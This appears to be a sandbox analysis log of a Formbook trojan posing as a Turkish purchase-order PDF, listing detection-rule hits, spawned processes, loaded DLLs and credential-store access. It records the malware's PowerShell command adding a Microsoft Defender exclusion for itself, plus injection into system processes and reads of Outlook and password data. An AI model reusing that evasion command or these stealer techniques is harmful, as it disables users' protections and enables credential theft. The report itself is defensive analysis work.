            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/5@16/10
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmylzck2.c5h.ps1Jump to behavior
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unregmp2.exe, 00000009.00000002.3778117405.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722883455.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030E5000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722762496.0000000003094000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeReversingLabs: Detection: 60%
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeVirustotal: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeProcess created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: unregmp2.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: owYCvHvzfwuh.exe, 00000008.00000002.3778328626.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3778593047.0000000000E1E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, unregmp2.exe, 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1542402038.0000000004979000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1544453300.0000000004B27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: unregmp2.pdbGCTL source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 00000008.00000002.3778464819.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 0_2_075D4425 pushfd ; retf 0_2_075D4426
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00418893 push 00000067h; ret 7_2_00418910
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00418907 push 00000067h; ret 7_2_00418910
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004051F1 push es; iretd 7_2_004051F3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004052E7 push F2DD9F13h; ret 7_2_004052EC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004053C6 push ebx; retf 7_2_004053CA
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004183DA push 00000018h; ret 7_2_004183DC
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_004084EE push ss; ret 7_2_004084FA
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00403480 push eax; ret 7_2_00403482
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00401DA0 push es; retf 7_2_00401DA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00401DA8 push es; retf 7_2_00401DA3
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0041A66B push ecx; ret 7_2_0041A67D
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0041A69C push ecx; ret 7_2_0041A67D
